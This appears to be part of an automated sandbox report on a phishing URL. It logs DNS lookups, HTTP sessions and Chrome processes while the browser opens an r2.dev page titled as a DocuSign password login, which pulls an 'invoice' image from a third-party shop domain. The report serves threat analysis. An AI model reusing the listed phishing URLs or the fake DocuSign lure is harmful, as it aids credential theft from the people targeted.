                      Jan 15, 2025 01:42:05.622531891 CET | 1.1.1.1 | 192.168.2.4 | 0xefd2 | No error (0) | www.continentalsports.co.uk |  | 95.154.228.177 | A (IP address) | IN (0x0001) | false
                      • pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev
                      • www.continentalsports.co.uk
                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      0 | 192.168.2.4 | 54324 | 172.66.0.235 | 80 | 1848 | C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jan 15, 2025 01:42:02.643342972 CET | 478 | OUT | GET /docu/e_protocol.html HTTP/1.1
                      Host: pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Encoding: gzip, deflate
                      Accept-Language: en-US,en;q=0.9
                      Jan 15, 2025 01:42:03.099009037 CET | 534 | IN | HTTP/1.1 301 Moved Permanently
                      Date: Wed, 15 Jan 2025 00:42:03 GMT
                      Content-Type: text/html
                      Content-Length: 167
                      Connection: keep-alive
                      Cache-Control: max-age=3600
                      Expires: Wed, 15 Jan 2025 01:42:03 GMT
                      Location: https://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html
                      Vary: Accept-Encoding
                      Server: cloudflare
                      CF-RAY: 9021d2d90e66de92-EWR
                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                      Jan 15, 2025 01:42:48.103246927 CET | 6 | OUT | Data Raw: 00
                      Data Ascii:


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      0 | 192.168.2.4 | 54327 | 172.66.0.235 | 443 | 1848 | C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-15 00:42:03 UTC | 706 | OUT | GET /docu/e_protocol.html HTTP/1.1
                      Host: pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-User: ?1
                      Sec-Fetch-Dest: document
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2025-01-15 00:42:03 UTC | 284 | IN | HTTP/1.1 200 OK
                      Date: Wed, 15 Jan 2025 00:42:03 GMT
                      Content-Type: text/html
                      Content-Length: 252205
                      Connection: close
                      Accept-Ranges: bytes
                      ETag: "ac9dbd4fd1fb0add29a1b8703bce9406"
                      Last-Modified: Thu, 09 Jan 2025 07:33:11 GMT
                      Server: cloudflare
                      CF-RAY: 9021d2dcda537d0c-EWR
                      Data Ascii: <!DOCTYPE html> <html lang=en class=account-server><meta charset=utf-8><meta name=viewport content="initial-scale=1.0"><title>DocuSign Login - Enter your password to sign in</title><style data-emotion=css data-single-filez-stylesheet=16>.account-serv


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      1 | 192.168.2.4 | 54330 | 95.154.228.177 | 443 | 1848 | C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-15 00:42:05 UTC | 635 | OUT | GET /media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg HTTP/1.1
                      Host: www.continentalsports.co.uk
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      sec-ch-ua-platform: "Windows"
                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                      Sec-Fetch-Site: cross-site
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: image
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2025-01-15 00:42:05 UTC | 370 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.10.3 (Ubuntu)
                      Date: Wed, 15 Jan 2025 00:42:05 GMT
                      Content-Type: image/jpeg
                      Content-Length: 7494
                      Last-Modified: Tue, 26 Jul 2022 21:55:08 GMT
                      Connection: close
                      ETag: "62e062bc-1d46"
                      Expires: Thu, 15 Jan 2026 00:42:05 GMT
                      Cache-Control: max-age=31536000
                      Cache-Control: public
                      X-Frame-Options: SAMEORIGIN
                      Accept-Ranges: bytes


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      2 | 192.168.2.4 | 54335 | 95.154.228.177 | 443 | 1848 | C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-15 00:42:06 UTC | 435 | OUT | GET /media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg HTTP/1.1
                      Host: www.continentalsports.co.uk
                      Connection: keep-alive
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: */*
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: cors
                      Sec-Fetch-Dest: empty
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2025-01-15 00:42:06 UTC | 370 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.10.3 (Ubuntu)
                      Date: Wed, 15 Jan 2025 00:42:06 GMT
                      Content-Type: image/jpeg
                      Content-Length: 7494
                      Last-Modified: Tue, 26 Jul 2022 21:55:08 GMT
                      Connection: close
                      ETag: "62e062bc-1d46"
                      Expires: Thu, 15 Jan 2026 00:42:06 GMT
                      Cache-Control: max-age=31536000
                      Cache-Control: public
                      X-Frame-Options: SAMEORIGIN
                      Accept-Ranges: bytes


                      Target ID:0
                      Start time:19:41:53
                      Start date:14/01/2025
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                      Imagebase:0x7ff76e190000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      Target ID:2
                      Start time:19:41:54
                      Start date:14/01/2025
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=2020,i,1219990260256689793,5521421119150629212,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Imagebase:0x7ff76e190000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      Target ID:3
                      Start time:19:42:01
                      Start date:14/01/2025
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html"
                      Imagebase:0x7ff76e190000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      No disassembly